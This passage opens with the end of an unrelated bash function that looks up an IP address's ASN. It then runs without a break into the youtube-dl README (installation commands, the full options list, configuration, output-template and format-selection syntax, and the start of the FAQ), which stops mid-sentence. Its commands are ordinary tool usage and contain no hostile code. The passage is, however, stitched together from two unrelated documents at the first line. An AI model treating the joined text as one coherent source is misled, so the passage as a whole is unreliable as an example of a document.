"$_ip" == "null" ]] || [[ "$_state" -ne 0 ]]; then echo -en "Unsuccessful ASN gathering.\\n" else echo -en "$_ip > $_asn\\n" fi } ``` Example: ```bash shell> GetASN 1.1.1.1 1.1.1.1 > AS13335 Cloudflare, Inc. shell> GetASN 0.0.0.0 Unsuccessful ASN gathering. ```
[![Build Status](https://travis-ci.org/ytdl-org/youtube-dl.svg?branch=master)](https://travis-ci.org/ytdl-org/youtube-dl) youtube-dl - download videos from youtube.com or other video platforms - [INSTALLATION](#installation) - [DESCRIPTION](#description) - [OPTIONS](#options) - [CONFIGURATION](#configuration) - [OUTPUT TEMPLATE](#output-template) - [FORMAT SELECTION](#format-selection) - [VIDEO SELECTION](#video-selection) - [FAQ](#faq) - [DEVELOPER INSTRUCTIONS](#developer-instructions) - [EMBEDDING YOUTUBE-DL](#embedding-youtube-dl) - [BUGS](#bugs) - [COPYRIGHT](#copyright) # INSTALLATION To install it right away for all UNIX users (Linux, macOS, etc.), type: sudo curl -L https://yt-dl.org/downloads/latest/youtube-dl -o /usr/local/bin/youtube-dl sudo chmod a+rx /usr/local/bin/youtube-dl If you do not have curl, you can alternatively use a recent wget: sudo wget https://yt-dl.org/downloads/latest/youtube-dl -O /usr/local/bin/youtube-dl sudo chmod a+rx /usr/local/bin/youtube-dl Windows users can [download an .exe file](https://yt-dl.org/latest/youtube-dl.exe) and place it in any location on their [PATH](https://en.wikipedia.org/wiki/PATH_%28variable%29) except for `%SYSTEMROOT%\System32` (e.g. **do not** put in `C:\Windows\System32`). You can also use pip: sudo -H pip install --upgrade youtube-dl This command will update youtube-dl if you have already installed it. See the [pypi page](https://pypi.python.org/pypi/youtube_dl) for more information. macOS users can install youtube-dl with [Homebrew](https://brew.sh/): brew install youtube-dl Or with [MacPorts](https://www.macports.org/): sudo port install youtube-dl Alternatively, refer to the [developer instructions](#developer-instructions) for how to check out and work with the git repository. For further options, including PGP signatures, see the [youtube-dl Download Page](https://ytdl-org.github.io/youtube-dl/download.html). # DESCRIPTION **youtube-dl** is a command-line program to download videos from YouTube.com and a few more sites. It requires the Python interpreter, version 2.6, 2.7, or 3.2+, and it is not platform specific. It should work on your Unix box, on Windows or on macOS. It is released to the public domain, which means you can modify it, redistribute it or use it however you like. youtube-dl [OPTIONS] URL [URL...] # OPTIONS -h, --help Print this help text and exit --version Print program version and exit -U, --update Update this program to latest version. Make sure that you have sufficient permissions (run with sudo if needed) -i, --ignore-errors Continue on download errors, for example to skip unavailable videos in a playlist --abort-on-error Abort downloading of further videos (in the playlist or the command line) if an error occurs --dump-user-agent Display the current browser identification --list-extractors List all supported extractors --extractor-descriptions Output descriptions of all supported extractors --force-generic-extractor Force extraction to use the generic extractor --default-search PREFIX Use this prefix for unqualified URLs. For example "gvsearch2:" downloads two videos from google videos for youtube-dl "large apple". Use the value "auto" to let youtube-dl guess ("auto_warning" to emit a warning when guessing). "error" just throws an error. The default value "fixup_error" repairs broken URLs, but emits an error if this is not possible instead of searching. --ignore-config Do not read configuration files. When given in the global configuration file /etc/youtube-dl.conf: Do not read the user configuration in ~/.config/youtube- dl/config (%APPDATA%/youtube-dl/config.txt on Windows) --config-location PATH Location of the configuration file; either the path to the config or its containing directory. --flat-playlist Do not extract the videos of a playlist, only list them. --mark-watched Mark videos watched (YouTube only) --no-mark-watched Do not mark videos watched (YouTube only) --no-color Do not emit color codes in output ## Network Options: --proxy URL Use the specified HTTP/HTTPS/SOCKS proxy. To enable SOCKS proxy, specify a proper scheme. For example socks5://127.0.0.1:1080/. Pass in an empty string (--proxy "") for direct connection --socket-timeout SECONDS Time to wait before giving up, in seconds --source-address IP Client-side IP address to bind to -4, --force-ipv4 Make all connections via IPv4 -6, --force-ipv6 Make all connections via IPv6 ## Geo Restriction: --geo-verification-proxy URL Use this proxy to verify the IP address for some geo-restricted sites. The default proxy specified by --proxy (or none, if the option is not present) is used for the actual downloading. --geo-bypass Bypass geographic restriction via faking X-Forwarded-For HTTP header --no-geo-bypass Do not bypass geographic restriction via faking X-Forwarded-For HTTP header --geo-bypass-country CODE Force bypass geographic restriction with explicitly provided two-letter ISO 3166-2 country code --geo-bypass-ip-block IP_BLOCK Force bypass geographic restriction with explicitly provided IP block in CIDR notation ## Video Selection: --playlist-start NUMBER Playlist video to start at (default is 1) --playlist-end NUMBER Playlist video to end at (default is last) --playlist-items ITEM_SPEC Playlist video items to download. Specify indices of the videos in the playlist separated by commas like: "--playlist-items 1,2,5,8" if you want to download videos indexed 1, 2, 5, 8 in the playlist. You can specify range: "--playlist-items 1-3,7,10-13", it will download the videos at index 1, 2, 3, 7, 10, 11, 12 and 13. --match-title REGEX Download only matching titles (regex or caseless sub-string) --reject-title REGEX Skip download for matching titles (regex or caseless sub-string) --max-downloads NUMBER Abort after downloading NUMBER files --min-filesize SIZE Do not download any videos smaller than SIZE (e.g. 50k or 44.6m) --max-filesize SIZE Do not download any videos larger than SIZE (e.g. 50k or 44.6m) --date DATE Download only videos uploaded in this date --datebefore DATE Download only videos uploaded on or before this date (i.e. inclusive) --dateafter DATE Download only videos uploaded on or after this date (i.e. inclusive) --min-views COUNT Do not download any videos with less than COUNT views --max-views COUNT Do not download any videos with more than COUNT views --match-filter FILTER Generic video filter. Specify any key (see the "OUTPUT TEMPLATE" for a list of available keys) to match if the key is present, !key to check if the key is not present, key > NUMBER (like "comment_count > 12", also works with >=, <, <=, !=, =) to compare against a number, key = 'LITERAL' (like "uploader = 'Mike Smith'", also works with !=) to match against a string literal and & to require multiple matches. Values which are not known are excluded unless you put a question mark (?) after the operator. For example, to only match videos that have been liked more than 100 times and disliked less than 50 times (or the dislike functionality is not available at the given service), but who also have a description, use --match-filter "like_count > 100 & dislike_count <? 50 & description" . --no-playlist Download only the video, if the URL refers to a video and a playlist. --yes-playlist Download the playlist, if the URL refers to a video and a playlist. --age-limit YEARS Download only videos suitable for the given age --download-archive FILE Download only videos not listed in the archive file. Record the IDs of all downloaded videos in it. --include-ads Download advertisements as well (experimental) ## Download Options: -r, --limit-rate RATE Maximum download rate in bytes per second (e.g. 50K or 4.2M) -R, --retries RETRIES Number of retries (default is 10), or "infinite". --fragment-retries RETRIES Number of retries for a fragment (default is 10), or "infinite" (DASH, hlsnative and ISM) --skip-unavailable-fragments Skip unavailable fragments (DASH, hlsnative and ISM) --abort-on-unavailable-fragment Abort downloading when some fragment is not available --keep-fragments Keep downloaded fragments on disk after downloading is finished; fragments are erased by default --buffer-size SIZE Size of download buffer (e.g. 1024 or 16K) (default is 1024) --no-resize-buffer Do not automatically adjust the buffer size. By default, the buffer size is automatically resized from an initial value of SIZE. --http-chunk-size SIZE Size of a chunk for chunk-based HTTP downloading (e.g. 10485760 or 10M) (default is disabled). May be useful for bypassing bandwidth throttling imposed by a webserver (experimental) --playlist-reverse Download playlist videos in reverse order --playlist-random Download playlist videos in random order --xattr-set-filesize Set file xattribute ytdl.filesize with expected file size --hls-prefer-native Use the native HLS downloader instead of ffmpeg --hls-prefer-ffmpeg Use ffmpeg instead of the native HLS downloader --hls-use-mpegts Use the mpegts container for HLS videos, allowing to play the video while downloading (some players may not be able to play it) --external-downloader COMMAND Use the specified external downloader. Currently supports aria2c,avconv,axel,curl,ffmpeg,httpie,wget --external-downloader-args ARGS Give these arguments to the external downloader ## Filesystem Options: -a, --batch-file FILE File containing URLs to download ('-' for stdin), one URL per line. Lines starting with '#', ';' or ']' are considered as comments and ignored. --id Use only video ID in file name -o, --output TEMPLATE Output filename template, see the "OUTPUT TEMPLATE" for all the info --autonumber-start NUMBER Specify the start value for %(autonumber)s (default is 1) --restrict-filenames Restrict filenames to only ASCII characters, and avoid "&" and spaces in filenames -w, --no-overwrites Do not overwrite files -c, --continue Force resume of partially downloaded files. By default, youtube-dl will resume downloads if possible. --no-continue Do not resume partially downloaded files (restart from beginning) --no-part Do not use .part files - write directly into output file --no-mtime Do not use the Last-modified header to set the file modification time --write-description Write video description to a .description file --write-info-json Write video metadata to a .info.json file --write-annotations Write video annotations to a .annotations.xml file --load-info-json FILE JSON file containing the video information (created with the "--write-info-json" option) --cookies FILE File to read cookies from and dump cookie jar in --cache-dir DIR Location in the filesystem where youtube-dl can store some downloaded information permanently. By default $XDG_CACHE_HOME/youtube-dl or ~/.cache/youtube-dl . At the moment, only YouTube player files (for videos with obfuscated signatures) are cached, but that may change. --no-cache-dir Disable filesystem caching --rm-cache-dir Delete all filesystem cache files ## Thumbnail images: --write-thumbnail Write thumbnail image to disk --write-all-thumbnails Write all thumbnail image formats to disk --list-thumbnails Simulate and list all available thumbnail formats ## Verbosity / Simulation Options: -q, --quiet Activate quiet mode --no-warnings Ignore warnings -s, --simulate Do not download the video and do not write anything to disk --skip-download Do not download the video -g, --get-url Simulate, quiet but print URL -e, --get-title Simulate, quiet but print title --get-id Simulate, quiet but print id --get-thumbnail Simulate, quiet but print thumbnail URL --get-description Simulate, quiet but print video description --get-duration Simulate, quiet but print video length --get-filename Simulate, quiet but print output filename --get-format Simulate, quiet but print output format -j, --dump-json Simulate, quiet but print JSON information. See the "OUTPUT TEMPLATE" for a description of available keys. -J, --dump-single-json Simulate, quiet but print JSON information for each command-line argument. If the URL refers to a playlist, dump the whole playlist information in a single line. --print-json Be quiet and print the video information as JSON (video is still being downloaded). --newline Output progress bar as new lines --no-progress Do not print progress bar --console-title Display progress in console titlebar -v, --verbose Print various debugging information --dump-pages Print downloaded pages encoded using base64 to debug problems (very verbose) --write-pages Write downloaded intermediary pages to files in the current directory to debug problems --print-traffic Display sent and read HTTP traffic -C, --call-home Contact the youtube-dl server for debugging --no-call-home Do NOT contact the youtube-dl server for debugging ## Workarounds: --encoding ENCODING Force the specified encoding (experimental) --no-check-certificate Suppress HTTPS certificate validation --prefer-insecure Use an unencrypted connection to retrieve information about the video. (Currently supported only for YouTube) --user-agent UA Specify a custom user agent --referer URL Specify a custom referer, use if the video access is restricted to one domain --add-header FIELD:VALUE Specify a custom HTTP header and its value, separated by a colon ':'. You can use this option multiple times --bidi-workaround Work around terminals that lack bidirectional text support. Requires bidiv or fribidi executable in PATH --sleep-interval SECONDS Number of seconds to sleep before each download when used alone or a lower bound of a range for randomized sleep before each download (minimum possible number of seconds to sleep) when used along with --max-sleep-interval. --max-sleep-interval SECONDS Upper bound of a range for randomized sleep before each download (maximum possible number of seconds to sleep). Must only be used along with --min-sleep-interval. ## Video Format Options: -f, --format FORMAT Video format code, see the "FORMAT SELECTION" for all the info --all-formats Download all available video formats --prefer-free-formats Prefer free video formats unless a specific one is requested -F, --list-formats List all available formats of requested videos --youtube-skip-dash-manifest Do not download the DASH manifests and related data on YouTube videos --merge-output-format FORMAT If a merge is required (e.g. bestvideo+bestaudio), output to given container format. One of mkv, mp4, ogg, webm, flv. Ignored if no merge is required ## Subtitle Options: --write-sub Write subtitle file --write-auto-sub Write automatically generated subtitle file (YouTube only) --all-subs Download all the available subtitles of the video --list-subs List all available subtitles for the video --sub-format FORMAT Subtitle format, accepts formats preference, for example: "srt" or "ass/srt/best" --sub-lang LANGS Languages of the subtitles to download (optional) separated by commas, use --list- subs for available language tags ## Authentication Options: -u, --username USERNAME Login with this account ID -p, --password PASSWORD Account password. If this option is left out, youtube-dl will ask interactively. -2, --twofactor TWOFACTOR Two-factor authentication code -n, --netrc Use .netrc authentication data --video-password PASSWORD Video password (vimeo, smotri, youku) ## Adobe Pass Options: --ap-mso MSO Adobe Pass multiple-system operator (TV provider) identifier, use --ap-list-mso for a list of available MSOs --ap-username USERNAME Multiple-system operator account login --ap-password PASSWORD Multiple-system operator account password. If this option is left out, youtube-dl will ask interactively. --ap-list-mso List all supported multiple-system operators ## Post-processing Options: -x, --extract-audio Convert video files to audio-only files (requires ffmpeg or avconv and ffprobe or avprobe) --audio-format FORMAT Specify audio format: "best", "aac", "flac", "mp3", "m4a", "opus", "vorbis", or "wav"; "best" by default; No effect without -x --audio-quality QUALITY Specify ffmpeg/avconv audio quality, insert a value between 0 (better) and 9 (worse) for VBR or a specific bitrate like 128K (default 5) --recode-video FORMAT Encode the video to another format if necessary (currently supported: mp4|flv|ogg|webm|mkv|avi) --postprocessor-args ARGS Give these arguments to the postprocessor -k, --keep-video Keep the video file on disk after the post- processing; the video is erased by default --no-post-overwrites Do not overwrite post-processed files; the post-processed files are overwritten by default --embed-subs Embed subtitles in the video (only for mp4, webm and mkv videos) --embed-thumbnail Embed thumbnail in the audio as cover art --add-metadata Write metadata to the video file --metadata-from-title FORMAT Parse additional metadata like song title / artist from the video title. The format syntax is the same as --output. Regular expression with named capture groups may also be used. The parsed parameters replace existing values. Example: --metadata-from- title "%(artist)s - %(title)s" matches a title like "Coldplay - Paradise". Example (regex): --metadata-from-title "(?P<artist>.+?) - (?P<title>.+)" --xattrs Write metadata to the video file's xattrs (using dublin core and xdg standards) --fixup POLICY Automatically correct known faults of the file. One of never (do nothing), warn (only emit a warning), detect_or_warn (the default; fix file if we can, warn otherwise) --prefer-avconv Prefer avconv over ffmpeg for running the postprocessors --prefer-ffmpeg Prefer ffmpeg over avconv for running the postprocessors (default) --ffmpeg-location PATH Location of the ffmpeg/avconv binary; either the path to the binary or its containing directory. --exec CMD Execute a command on the file after downloading, similar to find's -exec syntax. Example: --exec 'adb push {} /sdcard/Music/ && rm {}' --convert-subs FORMAT Convert the subtitles to other format (currently supported: srt|ass|vtt|lrc) # CONFIGURATION You can configure youtube-dl by placing any supported command line option to a configuration file. On Linux and macOS, the system wide configuration file is located at `/etc/youtube-dl.conf` and the user wide configuration file at `~/.config/youtube-dl/config`. On Windows, the user wide configuration file locations are `%APPDATA%\youtube-dl\config.txt` or `C:\Users\<user name>\youtube-dl.conf`. Note that by default configuration file may not exist so you may need to create it yourself. For example, with the following configuration file youtube-dl will always extract the audio, not copy the mtime, use a proxy and save all videos under `Movies` directory in your home directory: ``` # Lines starting with # are comments # Always extract audio -x # Do not copy the mtime --no-mtime # Use this proxy --proxy 127.0.0.1:3128 # Save all videos under Movies directory in your home directory -o ~/Movies/%(title)s.%(ext)s ``` Note that options in configuration file are just the same options aka switches used in regular command line calls thus there **must be no whitespace** after `-` or `--`, e.g. `-o` or `--proxy` but not `- o` or `-- proxy`. You can use `--ignore-config` if you want to disable the configuration file for a particular youtube-dl run. You can also use `--config-location` if you want to use custom configuration file for a particular youtube-dl run. ### Authentication with `.netrc` file You may also want to configure automatic credentials storage for extractors that support authentication (by providing login and password with `--username` and `--password`) in order not to pass credentials as command line arguments on every youtube-dl execution and prevent tracking plain text passwords in the shell command history. You can achieve this using a [`.netrc` file](https://stackoverflow.com/tags/.netrc/info) on a per extractor basis. For that you will need to create a `.netrc` file in your `$HOME` and restrict permissions to read/write by only you: ``` touch $HOME/.netrc chmod a-rwx,u+rw $HOME/.netrc ``` After that you can add credentials for an extractor in the following format, where *extractor* is the name of the extractor in lowercase: ``` machine <extractor> login <login> password <password> ``` For example: ``` machine youtube login [email protected] password my_youtube_password machine twitch login my_twitch_account_name password my_twitch_password ``` To activate authentication with the `.netrc` file you should pass `--netrc` to youtube-dl or place it in the [configuration file](#configuration). On Windows you may also need to setup the `%HOME%` environment variable manually. For example: ``` set HOME=%USERPROFILE% ``` # OUTPUT TEMPLATE The `-o` option allows users to indicate a template for the output file names. **tl;dr:** [navigate me to examples](#output-template-examples). The basic usage is not to set any template arguments when downloading a single file, like in `youtube-dl -o funny_video.flv "https://some/video"`. However, it may contain special sequences that will be replaced when downloading each video. The special sequences may be formatted according to [python string formatting operations](https://docs.python.org/2/library/stdtypes.html#string-formatting). For example, `%(NAME)s` or `%(NAME)05d`. To clarify, that is a percent symbol followed by a name in parentheses, followed by formatting operations. Allowed names along with sequence type are: - `id` (string): Video identifier - `title` (string): Video title - `url` (string): Video URL - `ext` (string): Video filename extension - `alt_title` (string): A secondary title of the video - `display_id` (string): An alternative identifier for the video - `uploader` (string): Full name of the video uploader - `license` (string): License name the video is licensed under - `creator` (string): The creator of the video - `release_date` (string): The date (YYYYMMDD) when the video was released - `timestamp` (numeric): UNIX timestamp of the moment the video became available - `upload_date` (string): Video upload date (YYYYMMDD) - `uploader_id` (string): Nickname or id of the video uploader - `channel` (string): Full name of the channel the video is uploaded on - `channel_id` (string): Id of the channel - `location` (string): Physical location where the video was filmed - `duration` (numeric): Length of the video in seconds - `view_count` (numeric): How many users have watched the video on the platform - `like_count` (numeric): Number of positive ratings of the video - `dislike_count` (numeric): Number of negative ratings of the video - `repost_count` (numeric): Number of reposts of the video - `average_rating` (numeric): Average rating give by users, the scale used depends on the webpage - `comment_count` (numeric): Number of comments on the video - `age_limit` (numeric): Age restriction for the video (years) - `is_live` (boolean): Whether this video is a live stream or a fixed-length video - `start_time` (numeric): Time in seconds where the reproduction should start, as specified in the URL - `end_time` (numeric): Time in seconds where the reproduction should end, as specified in the URL - `format` (string): A human-readable description of the format - `format_id` (string): Format code specified by `--format` - `format_note` (string): Additional info about the format - `width` (numeric): Width of the video - `height` (numeric): Height of the video - `resolution` (string): Textual description of width and height - `tbr` (numeric): Average bitrate of audio and video in KBit/s - `abr` (numeric): Average audio bitrate in KBit/s - `acodec` (string): Name of the audio codec in use - `asr` (numeric): Audio sampling rate in Hertz - `vbr` (numeric): Average video bitrate in KBit/s - `fps` (numeric): Frame rate - `vcodec` (string): Name of the video codec in use - `container` (string): Name of the container format - `filesize` (numeric): The number of bytes, if known in advance - `filesize_approx` (numeric): An estimate for the number of bytes - `protocol` (string): The protocol that will be used for the actual download - `extractor` (string): Name of the extractor - `extractor_key` (string): Key name of the extractor - `epoch` (numeric): Unix epoch when creating the file - `autonumber` (numeric): Five-digit number that will be increased with each download, starting at zero - `playlist` (string): Name or id of the playlist that contains the video - `playlist_index` (numeric): Index of the video in the playlist padded with leading zeros according to the total length of the playlist - `playlist_id` (string): Playlist identifier - `playlist_title` (string): Playlist title - `playlist_uploader` (string): Full name of the playlist uploader - `playlist_uploader_id` (string): Nickname or id of the playlist uploader Available for the video that belongs to some logical chapter or section: - `chapter` (string): Name or title of the chapter the video belongs to - `chapter_number` (numeric): Number of the chapter the video belongs to - `chapter_id` (string): Id of the chapter the video belongs to Available for the video that is an episode of some series or programme: - `series` (string): Title of the series or programme the video episode belongs to - `season` (string): Title of the season the video episode belongs to - `season_number` (numeric): Number of the season the video episode belongs to - `season_id` (string): Id of the season the video episode belongs to - `episode` (string): Title of the video episode - `episode_number` (numeric): Number of the video episode within a season - `episode_id` (string): Id of the video episode Available for the media that is a track or a part of a music album: - `track` (string): Title of the track - `track_number` (numeric): Number of the track within an album or a disc - `track_id` (string): Id of the track - `artist` (string): Artist(s) of the track - `genre` (string): Genre(s) of the track - `album` (string): Title of the album the track belongs to - `album_type` (string): Type of the album - `album_artist` (string): List of all artists appeared on the album - `disc_number` (numeric): Number of the disc or other physical medium the track belongs to - `release_year` (numeric): Year (YYYY) when the album was released Each aforementioned sequence when referenced in an output template will be replaced by the actual value corresponding to the sequence name. Note that some of the sequences are not guaranteed to be present since they depend on the metadata obtained by a particular extractor. Such sequences will be replaced with `NA`. For example for `-o %(title)s-%(id)s.%(ext)s` and an mp4 video with title `youtube-dl test video` and id `BaW_jenozKcj`, this will result in a `youtube-dl test video-BaW_jenozKcj.mp4` file created in the current directory. For numeric sequences you can use numeric related formatting, for example, `%(view_count)05d` will result in a string with view count padded with zeros up to 5 characters, like in `00042`. Output templates can also contain arbitrary hierarchical path, e.g. `-o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s'` which will result in downloading each video in a directory corresponding to this path template. Any missing directory will be automatically created for you. To use percent literals in an output template use `%%`. To output to stdout use `-o -`. The current default template is `%(title)s-%(id)s.%(ext)s`. In some cases, you don't want special characters such as ไธญ, spaces, or &, such as when transferring the downloaded filename to a Windows system or the filename through an 8bit-unsafe channel. In these cases, add the `--restrict-filenames` flag to get a shorter title: #### Output template and Windows batch files If you are using an output template inside a Windows batch file then you must escape plain percent characters (`%`) by doubling, so that `-o "%(title)s-%(id)s.%(ext)s"` should become `-o "%%(title)s-%%(id)s.%%(ext)s"`. However you should not touch `%`'s that are not plain characters, e.g. environment variables for expansion should stay intact: `-o "C:\%HOMEPATH%\Desktop\%%(title)s.%%(ext)s"`. #### Output template examples Note that on Windows you may need to use double quotes instead of single. ```bash $ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc youtube-dl test video ''_รคโ†ญ๐•.mp4 # All kinds of weird characters $ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc --restrict-filenames youtube-dl_test_video_.mp4 # A simple file name # Download YouTube playlist videos in separate directory indexed by video order in a playlist $ youtube-dl -o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re # Download all playlists of YouTube channel/user keeping each playlist in separate directory: $ youtube-dl -o '%(uploader)s/%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/user/TheLinuxFoundation/playlists # Download Udemy course keeping each chapter in separate directory under MyVideos directory in your home $ youtube-dl -u user -p password -o '~/MyVideos/%(playlist)s/%(chapter_number)s - %(chapter)s/%(title)s.%(ext)s' https://www.udemy.com/java-tutorial/ # Download entire series season keeping each series and each season in separate directory under C:/MyVideos $ youtube-dl -o "C:/MyVideos/%(series)s/%(season_number)s - %(season)s/%(episode_number)s - %(episode)s.%(ext)s" https://videomore.ru/kino_v_detalayah/5_sezon/367617 # Stream the video being downloaded to stdout $ youtube-dl -o - BaW_jenozKc ``` # FORMAT SELECTION By default youtube-dl tries to download the best available quality, i.e. if you want the best quality you **don't need** to pass any special options, youtube-dl will guess it for you by **default**. But sometimes you may want to download in a different format, for example when you are on a slow or intermittent connection. The key mechanism for achieving this is so-called *format selection* based on which you can explicitly specify desired format, select formats based on some criterion or criteria, setup precedence and much more. The general syntax for format selection is `--format FORMAT` or shorter `-f FORMAT` where `FORMAT` is a *selector expression*, i.e. an expression that describes format or formats you would like to download. **tl;dr:** [navigate me to examples](#format-selection-examples). The simplest case is requesting a specific format, for example with `-f 22` you can download the format with format code equal to 22. You can get the list of available format codes for particular video using `--list-formats` or `-F`. Note that these format codes are extractor specific. You can also use a file extension (currently `3gp`, `aac`, `flv`, `m4a`, `mp3`, `mp4`, `ogg`, `wav`, `webm` are supported) to download the best quality format of a particular file extension served as a single file, e.g. `-f webm` will download the best quality format with the `webm` extension served as a single file. You can also use special names to select particular edge case formats: - `best`: Select the best quality format represented by a single file with video and audio. - `worst`: Select the worst quality format represented by a single file with video and audio. - `bestvideo`: Select the best quality video-only format (e.g. DASH video). May not be available. - `worstvideo`: Select the worst quality video-only format. May not be available. - `bestaudio`: Select the best quality audio only-format. May not be available. - `worstaudio`: Select the worst quality audio only-format. May not be available. For example, to download the worst quality video-only format you can use `-f worstvideo`. If you want to download multiple videos and they don't have the same formats available, you can specify the order of preference using slashes. Note that slash is left-associative, i.e. formats on the left hand side are preferred, for example `-f 22/17/18` will download format 22 if it's available, otherwise it will download format 17 if it's available, otherwise it will download format 18 if it's available, otherwise it will complain that no suitable formats are available for download. If you want to download several formats of the same video use a comma as a separator, e.g. `-f 22,17,18` will download all these three formats, of course if they are available. Or a more sophisticated example combined with the precedence feature: `-f 136/137/mp4/bestvideo,140/m4a/bestaudio`. You can also filter the video formats by putting a condition in brackets, as in `-f "best[height=720]"` (or `-f "[filesize>10M]"`). The following numeric meta fields can be used with comparisons `<`, `<=`, `>`, `>=`, `=` (equals), `!=` (not equals): - `filesize`: The number of bytes, if known in advance - `width`: Width of the video, if known - `height`: Height of the video, if known - `tbr`: Average bitrate of audio and video in KBit/s - `abr`: Average audio bitrate in KBit/s - `vbr`: Average video bitrate in KBit/s - `asr`: Audio sampling rate in Hertz - `fps`: Frame rate Also filtering work for comparisons `=` (equals), `^=` (starts with), `$=` (ends with), `*=` (contains) and following string meta fields: - `ext`: File extension - `acodec`: Name of the audio codec in use - `vcodec`: Name of the video codec in use - `container`: Name of the container format - `protocol`: The protocol that will be used for the actual download, lower-case (`http`, `https`, `rtsp`, `rtmp`, `rtmpe`, `mms`, `f4m`, `ism`, `http_dash_segments`, `m3u8`, or `m3u8_native`) - `format_id`: A short description of the format Any string comparison may be prefixed with negation `!` in order to produce an opposite comparison, e.g. `!*=` (does not contain). Note that none of the aforementioned meta fields are guaranteed to be present since this solely depends on the metadata obtained by particular extractor, i.e. the metadata offered by the video hoster. Formats for which the value is not known are excluded unless you put a question mark (`?`) after the operator. You can combine format filters, so `-f "[height <=? 720][tbr>500]"` selects up to 720p videos (or videos where the height is not known) with a bitrate of at least 500 KBit/s. You can merge the video and audio of two formats into a single file using `-f <video-format>+<audio-format>` (requires ffmpeg or avconv installed), for example `-f bestvideo+bestaudio` will download the best video-only format, the best audio-only format and mux them together with ffmpeg/avconv. Format selectors can also be grouped using parentheses, for example if you want to download the best mp4 and webm formats with a height lower than 480 you can use `-f '(mp4,webm)[height<480]'`. Since the end of April 2015 and version 2015.04.26, youtube-dl uses `-f bestvideo+bestaudio/best` as the default format selection (see [#5447](https://github.com/ytdl-org/youtube-dl/issues/5447), [#5456](https://github.com/ytdl-org/youtube-dl/issues/5456)). If ffmpeg or avconv are installed this results in downloading `bestvideo` and `bestaudio` separately and muxing them together into a single file giving the best overall quality available. Otherwise it falls back to `best` and results in downloading the best available quality served as a single file. `best` is also needed for videos that don't come from YouTube because they don't provide the audio and video in two different files. If you want to only download some DASH formats (for example if you are not interested in getting videos with a resolution higher than 1080p), you can add `-f bestvideo[height<=?1080]+bestaudio/best` to your configuration file. Note that if you use youtube-dl to stream to `stdout` (and most likely to pipe it to your media player then), i.e. you explicitly specify output template as `-o -`, youtube-dl still uses `-f best` format selection in order to start content delivery immediately to your player and not to wait until `bestvideo` and `bestaudio` are downloaded and muxed. If you want to preserve the old format selection behavior (prior to youtube-dl 2015.04.26), i.e. you want to download the best available quality media served as a single file, you should explicitly specify your choice with `-f best`. You may want to add it to the [configuration file](#configuration) in order not to type it every time you run youtube-dl. #### Format selection examples Note that on Windows you may need to use double quotes instead of single. ```bash # Download best mp4 format available or any other best if no mp4 available $ youtube-dl -f 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best' # Download best format available but no better than 480p $ youtube-dl -f 'bestvideo[height<=480]+bestaudio/best[height<=480]' # Download best video only format but no bigger than 50 MB $ youtube-dl -f 'best[filesize<50M]' # Download best format available via direct link over HTTP/HTTPS protocol $ youtube-dl -f '(bestvideo+bestaudio/best)[protocol^=http]' # Download the best video format and the best audio format without merging them $ youtube-dl -f 'bestvideo,bestaudio' -o '%(title)s.f%(format_id)s.%(ext)s' ``` Note that in the last example, an output template is recommended as bestvideo and bestaudio may have the same file name. # VIDEO SELECTION Videos can be filtered by their upload date using the options `--date`, `--datebefore` or `--dateafter`. They accept dates in two formats: - Absolute dates: Dates in the format `YYYYMMDD`. - Relative dates: Dates in the format `(now|today)[+-][0-9](day|week|month|year)(s)?` Examples: ```bash # Download only the videos uploaded in the last 6 months $ youtube-dl --dateafter now-6months # Download only the videos uploaded on January 1, 1970 $ youtube-dl --date 19700101 $ # Download only the videos uploaded in the 200x decade $ youtube-dl --dateafter 20000101 --datebefore 20091231 ``` # FAQ ### How do I update youtube-dl? If you've followed [our manual installation instructions](https://ytdl-org.github.io/youtube-dl/download.html), you can simply run `youtube-dl -U` (or, on Linux, `sudo youtube-dl -U`). If you have used pip, a simple `sudo pip install -U youtube-dl` is sufficient to update. If you have installed youtube-dl using a package manager like *apt-get* or *yum*, use the standard system update mechanism to update. Note that distribution packages are often outdated. As a rule of thumb, youtube-dl releases at least once a month, and often weekly or even daily. Simply go to https://yt-dl.org to find out the current version. Unfortunately, there is nothing we youtube-dl developers can do if your distribution serves a really outdated version. You can (and should) complain to your distribution in their bugtracker or support forum. As a last resort, you can also uninstall the version installed by your package manager and follow our manual installation instructions. For that, remove the distribution's package, with a line like sudo apt-get remove -y youtube-dl Afterwards, simply follow [our manual installation instructions](https://ytdl-org.github.io/youtube-dl/download.html): ``` sudo wget https://yt-dl.org/downloads/latest/youtube-dl -O /usr/local/bin/youtube-dl sudo chmod a+rx /usr/local/bin/youtube-dl hash -r ``` Again, from then on you'll be able to update with `sudo youtube-dl -U`. ### youtube-dl is extremely slow to start on Windows Add a file exclusion for `youtube-dl.exe` in Windows Defender settings. ### I'm getting an error `Unable to extract OpenGraph title` on YouTube playlists YouTube changed their playlist format in March 2014 and later on, so you'll need at least youtube-dl 2014.07.25 to download all YouTube videos. If you have installed youtube-dl with a package manager, pip, setup.py or a tarball, please use that to update. Note that Ubuntu packages do not seem to get updated anymore. Since we are not affiliated with Ubuntu, there is little we can do. Feel free to [report bugs](https://bugs.launchpad.net/ubuntu/+source/youtube-dl/+filebug) to the [Ubuntu packaging people](mailto:[email protected]?subject=outdated%20version%20of%20youtube-dl) - all they have to do is update the package to a somewhat recent version. See above for a way to update. ### I'm getting an error when trying to use output template: `error: using output template conflicts with using title, video ID or auto number` Make sure you are not using `-o` with any of these options `-t`, `--title`, `--id`, `-A` or `--auto-number` set in command line or in a configuration file. Remove the latter if any. ### Do I always have to pass `-citw`? By default, youtube-dl intends to have the best options (incidentally, if you have a convincing case that these should be different, [please file an issue where you explain that](https://yt-dl.org/bug)). Therefore, it is unnecessary and sometimes harmful to copy long option strings from webpages. In particular, the only option out of `-citw` that is regularly useful is `-i`. ### Can you please put the `-b` option back? Most people asking this question are not aware that youtube-dl now defaults to downloading the highest available quality as reported by YouTube, which will be 1080p or 720p in some cases, so you no longer need the `-b` option. For some specific videos, maybe YouTube does not report them to be available in a specific high quality format you're interested in. In that case, simply request it with the `-f` option and youtube-dl will try to download it. ### I get HTTP error 402 when trying to download a video. What's this? Apparently YouTube requires you to pass a 